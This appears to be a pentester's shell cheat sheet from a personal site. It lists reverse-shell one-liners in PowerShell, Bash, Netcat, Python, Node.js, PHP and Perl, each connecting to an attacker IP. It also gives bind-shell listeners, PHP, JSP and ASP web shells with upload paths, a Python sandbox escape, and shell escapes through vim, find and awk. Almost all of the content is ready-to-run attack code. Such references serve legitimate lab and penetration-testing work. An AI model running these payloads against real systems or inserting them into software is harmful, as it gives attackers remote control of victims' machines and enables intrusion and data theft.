Table of Content
Online Generator: https://www.revshells.com/ or check out my tool at https://tools.ranevillanueva.com/revshells
Spawn Interactive Shell
/usr/bin/script -qc /bin/bash /dev/null- python
python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xterm
### CTRL+Z
stty raw -echo; fg- bash
script /dev/null -c bash
### CTRL+Z
stty raw -echo; fg###Terminal type? screen- sh
/bin/sh -i- If the shell does not cover the entire terminal
# Display TERM variableecho $TERM# OUTPUT: xterm-256color
# Display row and column sizestty size# OUTPUT: 67 318
export TERM=xterm-256colorstty rows 67 columns 318Spawn Shell
perl
perl —e 'exec "/bin/sh";'# OR## Run from a scriptperl: exec "/bin/sh";Ruby
## Run from a scriptruby: exec "/bin/sh"Lua
-- Run from a scriptlua: os.execute('/bin/sh')AWK
awk 'BEGIN {system("/bin/sh")}'Find
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;# ORfind . -exec /bin/sh \; -quitVIM
vim -c ':!/bin/sh'Vim Escape
vim:set shell=/bin/sh:shellReverse Shell
- The process is to establish a netcat listener on the attacker then the reverse shell from the victim will connect to the listener.
Powershell
Oneliner
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
Bash
Oneliner
bash -c "bash -i >& /dev/tcp/10.10.16.10/1337 0>&1"echo 'bash -i >& /dev/tcp/10.10.16.10/1337 0>&1' | bashrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
file
#!/bin/bashbash -i >& /dev/tcp/10.10.16.10/1338 0>&1Netcat
Oneliner
/bin/nc -nv 192.168.45.218 9090 -e /bin/bash
Python
Oneliner
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.51",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Multiline
import socketimport subprocessimport os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.49.51",9090))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"]);'Advanced
().__class__.__base__.__subclasses__()[317](["/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.165/1337 0>&1"])- Alternative to import - show subclasses
print(().__class__.__base__.__subclasses__())
- Alternative to import - show subclasses
Node.js
Oneliner
echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js
Payload
require("child_process").exec("nc -nv 192.168.49.51 9090 -e /bin/bash");PHP
Oneliner
php -r "system("bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'");"- or
php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'\");" -
Note: encode all special characters inside single quotes (including single quotes).
php%20-r%20%22system(%5C%22bash%20-c%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E45%2E218%2F9090%200%3E%261%27%5C%22);%22
- or
php -r '$sock=fsockopen("192.168.49.51",9090);exec("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("192.168.49.51",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("192.168.49.51",9090);system("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("192.168.49.51",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("192.168.49.51",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
Perl
Oneliner
perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Multiline
use Socket;$i="192.168.49.51";$p=9090;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))) { open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");}Web Shell
- Where to upload web shells:
- Apache -
/var/www/html/ - Nginx -
/usr/local/nginx/html - IIS -
c:\inetpub\wwwroot\ - XAMPP -
c:\xampp\htdocs\
- Apache -
PHP
<?php system($_GET["cmd"]); ?>
To use, utilize URL parameter: http://example.com/shell.php?cmd=ls
JSP
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
ASP
<% eval request("cmd") %>
Writing from shell to a file
echo "<pre><?php passthru(\$_GET['cmd']); ?></pre>" > /var/www/html/webshell.php
Bind Shell
- The process is establish a listener from the victim machine (aka the bind shell itself) and the attacker will connect to the listener.
Bash
Oneliner
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
Python
Oneliner
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
Powershell
Oneliner
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
Changelogs
| Date | Details |
|---|---|
| 2026 Apr 01 | Added tools.ranevillanueva.com/shells |